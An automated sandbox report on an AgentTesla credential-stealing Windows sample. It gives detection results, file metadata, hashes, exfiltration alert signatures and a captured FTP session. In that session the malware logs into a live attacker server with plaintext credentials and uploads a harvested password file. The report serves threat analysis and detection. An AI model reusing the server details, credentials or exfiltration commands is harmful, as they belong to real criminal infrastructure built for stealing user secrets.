                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                    Source | Detection | Scanner | Label
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe | 29% | ReversingLabs | Win32.Trojan.Generic
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe | 39% | Virustotal |
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe | 100% | Avira | HEUR/AGEN.1309856
                    SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    wapination.net | 0% | Virustotal |
                    ftp.wapination.net | 1% | Virustotal |

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    wapination.net | 108.179.234.136 | true | true | | unknown
                    ftp.wapination.net | unknown | unknown | true | | unknown

                    IP | Domain | Country | ASN | ASN Name | Malicious
                    108.179.234.136 | wapination.net | United States | 46606 | UNIFIEDLAYER-AS-1US | true

                    Joe Sandbox version: 40.0.0 Tourmaline
                    Analysis ID: 1459875
                    Start date and time: 2024-06-20 07:23:12 +02:00
                    Joe Sandbox product: CloudBasic
                    Overall analysis duration: 0h 6m 31s
                    Hypervisor based Inspection enabled: false
                    Report type: full
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed: 7
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Sample name: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Detection: MAL
                    Classification: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 142
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, PID 7128 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Time | Type | Description
                    01:24:13 | API Interceptor | 8x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe modified

                    Match | Associated Sample Name / URL | Detection | Threat Name
                    108.179.234.136 | Shipping Documents_pdf.scr.exe | malicious | AgentTesla
                    108.179.234.136 | Quotation_#432768#_pdf.scr.exe | malicious | AgentTesla, PureLog Stealer
                    108.179.234.136 | Payment Advice Copy-EUR 5500,00 20240419165413-docx.pif.exe | malicious | AgentTesla, PureLog Stealer
                    108.179.234.136 | Payment_Advice-pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine

                            Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            File Type: ASCII text, with CRLF line terminators
                            Category: dropped
                            Size (bytes): 1301
                            Entropy (8bit): 5.334025345208678
                            Encrypted: false
                            SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                            MD5: C8D49A85A61847AAE0536AE8856F6DEC
                            SHA1: D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                            SHA-256: 3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                            SHA-512: FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                            Malicious: true
                            Reputation: moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                            File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit): 7.92808851494674
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            File size: 643'584 bytes
                            MD5: 64073b255ae31ff074cb796d8863bce3
                            SHA1: 98a21169f0ea27a70b0a456b0d3e9bf3fe018014
                            SHA256: 1b42d958ccd31edd5a5839eaa6744c3d07d3708dcbc38f4b683d89e1f85dde2c
                            SHA512: 02c738bc4f7afcfe776bfa437beeb38278ef316910e2f6154f403a5a04d2c254d7bab930a0231e2be9361e5119ffe6686791986c91bf176c254559b62fa8f32c
                            SSDEEP: 12288:nz9wThptgAsZMuwGytdr5wHLEdE5uWNgPxheTQr3N/13yTwP:bNZWGyXmrEdwNvYU
                            TLSH: 4ED41205F7FB9F16C72E7BF29962886047F7606B9130E70B0EC6A8DD1E217948950B93
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sf................................. ........@.. .......................@............@................................
                            Icon Hash: 90cececece8e8eb0
                            Entrypoint: 0x49e79e
                            Entrypoint Section: .text
                            Digitally signed: false
                            Imagebase: 0x400000
                            Subsystem: windows gui
                            Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp: 0x66738295 [Thu Jun 20 01:15:01 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major: 4
                            OS Version Minor: 0
                            File Version Major: 4
                            File Version Minor: 0
                            Subsystem Version Major: 4
                            Subsystem Version Minor: 0
                            Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9e750 | 0x4b | .text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x600 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa2000 | 0xc | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x2000 | 0x9c7a4 | 0x9c800 | 38f0ae117e856aade6f8d4dd72a0546e | False | 0.9529190794728435 | data | 7.935386326287815 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc | 0xa0000 | 0x600 | 0x600 | e01c8611ab0c4860e51fd6cc65b4e0e9 | False | 0.4329427083333333 | data | 4.12172404707844 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0xa2000 | 0xc | 0x200 | 92c733eedeb099de1abaf0c24daaa978 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_VERSION | 0xa0090 | 0x32c | data | | | 0.4445812807881773
                            RT_MANIFEST | 0xa03cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                            DLL | Import
                            mscoree.dll | _CorExeMain
                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            06/20/24-07:24:18.598870 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49737 | 47602 | 192.168.2.4 | 108.179.234.136
                            06/20/24-07:24:18.182738 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49735 | 21 | 192.168.2.4 | 108.179.234.136
                            06/20/24-07:24:18.598870 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49737 | 47602 | 192.168.2.4 | 108.179.234.136
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jun 20, 2024 07:24:16.528513908 CEST | 53682 | 53 | 192.168.2.4 | 1.1.1.1
                            Jun 20, 2024 07:24:16.847151041 CEST | 53 | 53682 | 1.1.1.1 | 192.168.2.4
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Jun 20, 2024 07:24:16.528513908 CEST | 192.168.2.4 | 1.1.1.1 | 0x8609 | Standard query (0) | ftp.wapination.net | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Jun 20, 2024 07:24:16.847151041 CEST | 1.1.1.1 | 192.168.2.4 | 0x8609 | No error (0) | ftp.wapination.net | wapination.net | | CNAME (Canonical name) | IN (0x0001) | false
                            Jun 20, 2024 07:24:16.847151041 CEST | 1.1.1.1 | 192.168.2.4 | 0x8609 | No error (0) | wapination.net | | 108.179.234.136 | A (IP address) | IN (0x0001) | false
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                            Jun 20, 2024 07:24:17.393280029 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                220-You are user number 6 of 150 allowed.
                                220-Local time is now 00:24. Server port: 21.
                                220-IPv6 connections are also welcome on this server.
                                220 You will be disconnected after 15 minutes of inactivity.
                            Jun 20, 2024 07:24:17.393634081 CEST | 49735 | 21 | 192.168.2.4 | 108.179.234.136 | USER pop@wapination.net
                            Jun 20, 2024 07:24:17.510782957 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 331 User pop@wapination.net OK. Password required
                            Jun 20, 2024 07:24:17.511066914 CEST | 49735 | 21 | 192.168.2.4 | 108.179.234.136 | PASS sync@#1235
                            Jun 20, 2024 07:24:17.709440947 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 230 OK. Current restricted directory is /
                            Jun 20, 2024 07:24:17.825558901 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 504 Unknown command
                            Jun 20, 2024 07:24:17.825774908 CEST | 49735 | 21 | 192.168.2.4 | 108.179.234.136 | PWD
                            Jun 20, 2024 07:24:17.942966938 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 257 "/" is your current location
                            Jun 20, 2024 07:24:17.943233967 CEST | 49735 | 21 | 192.168.2.4 | 108.179.234.136 | TYPE I
                            Jun 20, 2024 07:24:18.059371948 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 200 TYPE is now 8-bit binary
                            Jun 20, 2024 07:24:18.059747934 CEST | 49735 | 21 | 192.168.2.4 | 108.179.234.136 | PASV
                            Jun 20, 2024 07:24:18.175935030 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 227 Entering Passive Mode (108,179,234,136,185,242)
                            Jun 20, 2024 07:24:18.182738066 CEST | 49735 | 21 | 192.168.2.4 | 108.179.234.136 | STOR PW_user-887849_2024_06_20_01_24_15.html
                            Jun 20, 2024 07:24:18.598625898 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 150 Accepted data connection
                            Jun 20, 2024 07:24:18.739942074 CEST | 21 | 49735 | 108.179.234.136 | 192.168.2.4 | 226-File successfully transferred
                                226 0.117 seconds (measured here), 2.67 Kbytes per second

                            Target ID:0
                            Start time:01:24:09
                            Start date:20/06/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                            Imagebase:0xc20000
                            File size:643'584 bytes
                            MD5 hash:64073B255AE31FF074CB796D8863BCE3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:01:24:14
                            Start date:20/06/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                            Imagebase:0xd60000
                            File size:643'584 bytes
                            MD5 hash:64073B255AE31FF074CB796D8863BCE3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                              Execution Graph

                              Execution Coverage:10.2%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:250
                              Total number of Limit Nodes:13
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (_^q$(_^q$,bq$4c^q$4c^q$Hbq$Nv]q$$^q$$^q$$^q$c^q$c^q
                              • API String ID: 0-692146702
                              • Opcode ID: c46d68e244b10bdd696e917b2a3fb25e94c87203580d94ec803353b3cb76ad47
                              • Instruction ID: a65e73265c08671899a7a2f61846166ff4c85c0d21e101c6392568528106e040
                              • Opcode Fuzzy Hash: c46d68e244b10bdd696e917b2a3fb25e94c87203580d94ec803353b3cb76ad47
                              • Instruction Fuzzy Hash: 338296B0B511198FCB59EBBD845027D66E3BFCDB00B6058A9D00ADB394EE35DC878B91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                              • API String ID: 0-2723476363
                              • Opcode ID: 592b2a300071375b21f7cd93ff5ec90d90c044aabfb49a88fd81bfbd07b38416
                              • Instruction ID: 1ddc1dfb2fb18057d2249b617c7dff33e33f0e8fea3196e1aacd544e2aa473cd
                              • Opcode Fuzzy Hash: 592b2a300071375b21f7cd93ff5ec90d90c044aabfb49a88fd81bfbd07b38416
                              • Instruction Fuzzy Hash: 3743F9B4A01619CFCB24DF28C988A9DBBB2FF49314F159595E409AB3A5DB30ED91CF40
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$(o^q$,bq$,bq$Hbq
                              • API String ID: 0-3486158592
                              • Opcode ID: d02e0d7e54a5274ac7c80f1b684bcf61e0e8c0458b632a005f2a62f54d7e6762
                              • Instruction ID: c237dc1a5f74c6df81901157473229a2b53bad4a35e35302a5521fe9b93e645d
                              • Opcode Fuzzy Hash: d02e0d7e54a5274ac7c80f1b684bcf61e0e8c0458b632a005f2a62f54d7e6762
                              • Instruction Fuzzy Hash: C762C2B1B01156DFCB54DF69C484AAEBBB2BF88714F159129E806DB3A4CB31EC41DB90
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2a057d6b8d956a458df66c105f75fada4db0da857b84623cee4efa3ddb3b293
                              • Instruction ID: bb1eef77ad57a49568596da4d54521e8a42dce5f36aab7536ec2ced97fd437b3
                              • Opcode Fuzzy Hash: b2a057d6b8d956a458df66c105f75fada4db0da857b84623cee4efa3ddb3b293
                              • Instruction Fuzzy Hash: 9621E4B0D056189BEB19CFAAD8447DEFEF6AFC8310F14C06AD409B6264DB7505498F60
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e1ad351e0e841566d658bba74aca215a7a88596c203f9234e26e431095fdaa8
                              • Instruction ID: d0e1bae157946d04c10fb196ed04e41f3aaf6d418ba3086df876173b98329ce0
                              • Opcode Fuzzy Hash: 3e1ad351e0e841566d658bba74aca215a7a88596c203f9234e26e431095fdaa8
                              • Instruction Fuzzy Hash: 1E21D5B0D04618DBEB18CF97D8447DEFAF6AFC8310F14C06AD40976254DB7505458F60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: fcq$ fcq$Te^q$Te^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-179644157
                              • Opcode ID: 3249dda3b34142b80972cab14f3ca40adfba88555329d20f1a8b1443a00d0a76
                              • Instruction ID: 18816080cff1a42719279b44398e809a37e2085ffd6c11e4100290082ead7bee
                              • Opcode Fuzzy Hash: 3249dda3b34142b80972cab14f3ca40adfba88555329d20f1a8b1443a00d0a76
                              • Instruction Fuzzy Hash: 6791D2B0F11219CFCB18CAA5D848AADB7B2FF95705F24991AE502AF395CB349C85CB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-1911786396
                              • Opcode ID: d8f304d0a0d66dee9d15e17805f516553aefa9abccd38571b70d9bc0d6a0825a
                              • Instruction ID: ce25c842ea5858f67b17e42612e634781a7bb42f799b498ca4160c1aa1c03a12
                              • Opcode Fuzzy Hash: d8f304d0a0d66dee9d15e17805f516553aefa9abccd38571b70d9bc0d6a0825a
                              • Instruction Fuzzy Hash: 12E1D270F41209DFDB149B78D858BAE7BF2BB89710F209825E542AB384DF749C85CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                              • API String ID: 0-1586662440
                              • Opcode ID: 48c97f584e0d86f514be6a3ec78ece72bd2162bdfefd000b2fac0790f9d4d610
                              • Instruction ID: 7b870739091b3dcb19ed9bc8acfde055ec47f02faef15bb8bbf9d35f27458d53
                              • Opcode Fuzzy Hash: 48c97f584e0d86f514be6a3ec78ece72bd2162bdfefd000b2fac0790f9d4d610
                              • Instruction Fuzzy Hash: 69D1D3B0F55205DFDB048B78D459BBD7BB2BB89711F209429E942EB384DB749C41CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: fcq$ fcq$Te^q$XX^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-3622600923
                              • Opcode ID: 425d070346c81f7857f3a27a92e241b62dacbf81d76d584f668b67f5faf71160
                              • Instruction ID: 25205294881a37575ef39a9008400a1df07f42368cc6aa81685ea018160ab10a
                              • Opcode Fuzzy Hash: 425d070346c81f7857f3a27a92e241b62dacbf81d76d584f668b67f5faf71160
                              • Instruction Fuzzy Hash: E171E1F0E12219CFDB18CBA5C848ABDB7B2FF91715F24995AE5029F295C734AC85CB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$(o^q$,bq$,bq$Hbq$d8cq
                              • API String ID: 0-1626189073
                              • Opcode ID: c527726afb1fc1da6ae662baf1d6aad2f4471bbf5b5d7608f809fbaf4dfb6c40
                              • Instruction ID: 95cee5488c4d41f020cfaf2e46f57d3d3a4d7050cc3e48d8f534850a1f29aa4e
                              • Opcode Fuzzy Hash: c527726afb1fc1da6ae662baf1d6aad2f4471bbf5b5d7608f809fbaf4dfb6c40
                              • Instruction Fuzzy Hash: E6C14871B111198FCB18DF68D958AAE7BBAFF88705F148029E906E73A4DB31DC41CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: LR^q$$^q$$^q
                              • API String ID: 0-3333519130
                              • Opcode ID: 30f82fff96d88816ded2d21b235c7b463ca84331b9da70d6cf4a9a7f952508d3
                              • Instruction ID: b5b97364f89090ea3a6c97f6e00a1f0cec1f4fa87e5e909762c7d6f1f454a0a2
                              • Opcode Fuzzy Hash: 30f82fff96d88816ded2d21b235c7b463ca84331b9da70d6cf4a9a7f952508d3
                              • Instruction Fuzzy Hash: A801FCF221E262DFC31586A6AC007B7FB68EB87316F155967F055C62C1C2389C50C7A6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q
                              • API String ID: 0-355816377
                              • Opcode ID: ace8ad12b79b84ec68e171ce24fa9bea427804b6d552271cc8a394f057c8fb7e
                              • Instruction ID: 9d231407de3522ba572c9a1a4cf861e9008a08b397b9f2279d52dd93a8acff52
                              • Opcode Fuzzy Hash: ace8ad12b79b84ec68e171ce24fa9bea427804b6d552271cc8a394f057c8fb7e
                              • Instruction Fuzzy Hash: 2C51D470B01208DFDB148B78D858BAD7BB3BB89B11F209424F542BB394DE709C81CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q
                              • API String ID: 0-355816377
                              • Opcode ID: b6a17737d1d140feadc02f589565ecc8e7a4b93d8b717b0fc8c195a8778a1125
                              • Instruction ID: 209bb381ca184bb3c6b7fae3fce2cf12827d0e3f151d3c03c1aa3e9bda1687cc
                              • Opcode Fuzzy Hash: b6a17737d1d140feadc02f589565ecc8e7a4b93d8b717b0fc8c195a8778a1125
                              • Instruction Fuzzy Hash: CB51B170B15208DFDB189B78D858BAD7BB3BB89B11F209425E542BB394DE749C81CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$,bq
                              • API String ID: 0-3021502629

                              APIs
                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 081278A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
